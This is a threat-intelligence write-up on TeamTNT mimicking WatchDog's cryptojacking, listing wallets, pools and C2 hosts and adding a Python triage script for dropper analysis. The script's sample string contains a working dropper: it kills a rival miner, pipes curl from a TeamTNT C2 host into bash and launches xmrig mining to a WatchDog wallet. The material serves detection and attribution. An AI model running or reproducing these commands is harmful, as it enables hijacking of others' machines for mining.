Cyber Threat

TeamTNT Using WatchDog TTPs to Expand Its Cryptojacking Footprint


June 10, 2021

Two samples show TeamTNT adapting its techniques to mimic WatchDog operations: 36ca9f84864ad022c255b7d91e75997f035716e4df5dc1c90ee2651f092f5d79 and 49366ae4766492d94136ca1f715a37554aa6243686c66bf3c6fbb9da9cb2793d.
First seen on Dec. 5 and Dec. 11, 2020 respectively, these samples show the direct replacement of the known WatchDog C2 infrastructure with new C2 infrastructure, without fully scrubbing the old WatchDog C2 references from the script.
It is unknown why TeamTNT would not have removed the previous C2 infrastructure from the script entirely to avoid leaving such an obvious breadcrumb.
One possibility is that these samples are simply proofs of concept (PoCs) for hijacking another group's infrastructure.
The new script also reuses the exact URL directory pattern present in known WatchDog operations, the directories b2f628 and b2f628fff19fda999999999.
Both samples contain a hardcoded Monero (XMR) wallet address and an associated mining pool.

If these changes are indeed new TeamTNT behaviors, this would be the first time TeamTNT cryptojacking operations have used a mining pool other than their traditional Monero pool, MoneroOcean[.]stream.
The operation introduces two mining pools not previously known to be used by TeamTNT actors: nanopool[.]org and f2pool[.]com.
Both pool configurations are instructed to pay out to the Monero wallet address 43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz.

Other samples contain instructions to find and kill any process using the TeamTNT-identified 43Xb Monero wallet address.
The scripts then rebuild the mining operation using two known WatchDog Monero wallet addresses:

82etS8QzVhqdiL6LMbb85BdEC3KgJeRGT3X1F3DQBnJa2tzgBJ54bn4aNDjuWDtpygBsRqcfGRK4gbbw3xUy3oJv7TwpUG4 and 87q6aU1M9xmQ5p3wh8Jzst5mcFfDzKEuuDjV6u7Q7UDnAXJR7FLeQH2UYFzhQatde2WHuZ9LbxRsf3PGA8gpnGXL3G7iWMv.
These are two of the three Monero wallets known to be associated with the WatchDog cryptojacking group. Of note, the IP address 139.99.102[.]72 listed in these samples corresponds to xmr-asia1.nanopool[.]org, i.e. the nanopool[.]org mining pool introduced above.
The URL addresses, email address and Monero wallet called out in the sample 36bf7b2ab7968880ccc696927c03167b6056e73043fd97a33d2468383a5bafce are known TeamTNT indicators.
These include an email address on a [.]red domain (the address itself is obfuscated in this copy of the page) and the Monero wallet address 87A5fSCR98nFSR9NCRxt6UFytca3hJXaRdDgf9NxhWTjT3q3AA8HECyZ1FdF93D5LPXsSqS8dKNsxCxafrbuVeZfMW3V7ib.


The malware sample 8adc8be4b7fa2f536f4479fa770bf4024b26b6838f5e798c702e4a7a9c1a48c6 contains the new WatchDog Monero wallet.
The same MOxmrigMOD URL path found in known TeamTNT IoCs is present, and this sample also contains additional URLs with very strong ties to TeamTNT infrastructure, specifically those on the domain oracle.zzhreceive[.]top.

Because the C2 infrastructure in these new scripts, both of which use the WatchDog directory b2f628, ties back to TeamTNT, there is a clear link between the WatchDog-style scripts and TeamTNT infrastructure.
The domain oracle.zzhreceive[.]top resolves to the IP address 199.19.226[.]117, which is also the resolution address of the known TeamTNT subdomain zzhrecieve.anondns[.]net.
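The indicators above (wallet addresses, pools, the b2f628 directory pattern, the MOxmrigMOD path and the zzhreceive C2 hosts) are enough to triage a recovered dropper script and say which group's infrastructure it pays and which competitor it evicts. The following is an added example, not Unit 42's tooling and not either group's script: it extracts Monero addresses from a shell script, maps them to the attributions given on this page, and flags the kill-competing-miner-by-wallet TTP. The sample script at the bottom is constructed for this example and combines the three behaviours described above; the `KILL_VERB` heuristic and the group labels in `WALLETS` are assumptions.

```python
"""Static triage of a cryptojacking dropper script against the indicators this
page attributes to TeamTNT and WatchDog.  Added example: not Unit 42's code and
not either group's script; the heuristics and the sample below are assumptions."""
import re

# Monero wallet -> operator, as attributed on this page (assumed group labels).
WALLETS = {
    "43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz":
        "TeamTNT (nanopool/f2pool samples)",
    "82etS8QzVhqdiL6LMbb85BdEC3KgJeRGT3X1F3DQBnJa2tzgBJ54bn4aNDjuWDtpygBsRqcfGRK4gbbw3xUy3oJv7TwpUG4":
        "WatchDog",
    "87q6aU1M9xmQ5p3wh8Jzst5mcFfDzKEuuDjV6u7Q7UDnAXJR7FLeQH2UYFzhQatde2WHuZ9LbxRsf3PGA8gpnGXL3G7iWMv":
        "WatchDog",
    "87A5fSCR98nFSR9NCRxt6UFytca3hJXaRdDgf9NxhWTjT3q3AA8HECyZ1FdF93D5LPXsSqS8dKNsxCxafrbuVeZfMW3V7ib":
        "TeamTNT",
}
# Pools and C2 hosts named on the page, refanged so they match a real script.
POOLS = {"nanopool.org", "f2pool.com", "moneroocean.stream"}
HOSTS = {"oracle.zzhreceive.top", "zzhrecieve.anondns.net",
         "199.19.226.117", "139.99.102.72"}
# URL directory pattern shared by WatchDog and the new TeamTNT scripts, plus the TeamTNT xmrig path.
PATH_MARKERS = ("b2f628fff19fda999999999", "b2f628", "MOxmrigMOD")

# Standard Monero address: 95 base58 chars starting with 4 (primary) or 8 (subaddress).
XMR_ADDR = re.compile(r"(?<![1-9A-HJ-NP-Za-km-z])[48][1-9A-HJ-NP-Za-km-z]{94}(?![1-9A-HJ-NP-Za-km-z])")
KILL_VERB = re.compile(r"\b(kill|pkill|killall)\b")   # assumed heuristic for the eviction TTP


def _group(addr):
    return WALLETS.get(addr, "unknown").split(" ")[0]


def triage(script_text):
    """Return a dict of the indicators found in one script and a one-line verdict."""
    text = script_text.replace("[.]", ".")            # accept defanged input as well
    r = {"wallets": {}, "pools": set(), "hosts": set(), "path_markers": set(),
         "kill_targets": [], "mine_targets": []}
    for line in text.splitlines():
        addrs = XMR_ADDR.findall(line)
        for a in addrs:
            r["wallets"][a] = WALLETS.get(a, "unknown")
        line_pools = [p for p in POOLS if p in line]
        r["pools"].update(line_pools)
        r["hosts"].update(h for h in HOSTS if h in line)
        r["path_markers"].update(m for m in PATH_MARKERS if m in line)
        if addrs and KILL_VERB.search(line):
            # TTP from the page: locate a competitor's miner by its wallet string and kill it.
            r["kill_targets"].extend(addrs)
        elif addrs and line_pools:
            # A wallet on the same line as a pool is the script's own payout target.
            r["mine_targets"].extend((a, p) for a in addrs for p in line_pools)
    r["verdict"] = _verdict(r)
    return r


def _verdict(r):
    if not (r["wallets"] or r["hosts"] or r["path_markers"] or r["pools"]):
        return "no known TeamTNT/WatchDog indicators"
    parts = []
    if r["kill_targets"]:
        parts.append("kills miners paying " + ", ".join(sorted({_group(a) for a in r["kill_targets"]})))
    if r["mine_targets"]:
        parts.append("mines to " + ", ".join(f"{_group(a)} wallet via {p}" for a, p in r["mine_targets"]))
    markers = sorted(r["hosts"] | r["path_markers"])
    if markers:
        parts.append("infrastructure markers: " + ", ".join(markers))
    return "; ".join(parts) or "known wallet present, role unclear"


# Constructed sample (not a real dropper) combining the behaviours described on the page:
# evict the 43Xb miner, fetch stages from the b2f628 directories on the TeamTNT C2,
# then mine to a WatchDog wallet through nanopool.
SAMPLE = """#!/bin/bash
ps aux | grep -v grep | grep '43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz' | awk '{print $2}' | xargs -I % kill -9 %
curl -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | bash
curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/xmrig -o /tmp/.x
nohup /tmp/.x -o xmr-asia1.nanopool.org:14444 -u 82etS8QzVhqdiL6LMbb85BdEC3KgJeRGT3X1F3DQBnJa2tzgBJ54bn4aNDjuWDtpygBsRqcfGRK4gbbw3xUy3oJv7TwpUG4 -k --tls >/dev/null 2>&1 &
"""

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

Run against a real sample, the report shows at a glance whether a script pays a TeamTNT or a WatchDog wallet and which wallet it hunts, which is exactly the back-and-forth the page describes. The Monero address regex matches standard 95-character addresses only; integrated addresses (106 characters) would need a second pattern.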

